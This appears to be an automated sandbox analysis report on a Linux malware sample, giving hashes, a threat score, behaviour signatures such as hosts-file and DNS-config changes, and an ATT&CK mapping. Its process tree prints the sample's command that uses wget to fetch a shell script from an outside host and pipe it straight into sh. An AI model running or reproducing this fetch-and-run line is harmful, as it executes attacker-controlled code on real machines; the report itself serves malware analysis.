Overview

overview

10

Static

static

10

b6173cea0b...934d9d

ubuntu-18.04-amd64

8

Analysis

  • max time kernel
    0s
  • max time network
    103s
  • platform
    linux_amd64
  • resource
    ubuntu1804-amd64-en-20211208
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-en-20211208kernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    29-01-2023 21:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b6173cea0bae6f5405c59da64eaae455fb0638809a2ea583c0486f257e934d9d

  • Size

    14KB

  • MD5

    b9509d8f38a9dec39cd732256df1d208

  • SHA1

    d8cb7fd7a23fca6784786d98c98b203fea0a616d

  • SHA256

    b6173cea0bae6f5405c59da64eaae455fb0638809a2ea583c0486f257e934d9d

  • SHA512

    305be85d1c727d9b88463263f498da6160749ce9cf21aa9c468ef2c0df8bbcc35194437c624a845932f52c489c81d351ea9ca7afee62ec267783fde6edbe21d4

  • SSDEEP

    96:RCw2TPnBWBmnZ/wTozrmf100kuEzANKAdaC75wKA/613iEGii/OTvA/xKTSiVr3d:R4zn8cJwTT9xEziKqhyKAJgEATSi

Score
8/10

Malware Config

Signatures

  • Modifies hosts file 1 IoCs

    Adds to hosts file used for mapping hosts to IP addresses.

  • Writes DNS configuration 1 TTPs 1 IoCs

    Writes data to DNS resolver config file.

Processes

  • /tmp/b6173cea0bae6f5405c59da64eaae455fb0638809a2ea583c0486f257e934d9d
    /tmp/b6173cea0bae6f5405c59da64eaae455fb0638809a2ea583c0486f257e934d9d
    1⤵
      PID:581
      • /bin/sh
        sh -c "wget --quiet http://m247.ltd:36663/..lolthats/unfortunate.sh -O- 2>/dev/null | sh >/dev/null 2>&1"
        2⤵
          PID:582
          • /bin/sh
            sh
            3⤵
              PID:584
            • /usr/bin/wget
              wget --quiet http://m247.ltd:36663/..lolthats/unfortunate.sh -O-
              3⤵
              • Modifies hosts file
              • Writes DNS configuration
              PID:583

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Initial Access

        Execution

        Persistence

        Privilege Escalation

        Defense Evasion

        Credential Access

        Discovery

        Lateral Movement

        Collection

        Exfiltration

        Command and Control

        Dynamic Resolution

        1
        T1568

        Impact

        Replay Monitor

        Loading Replay Monitor...

        Downloads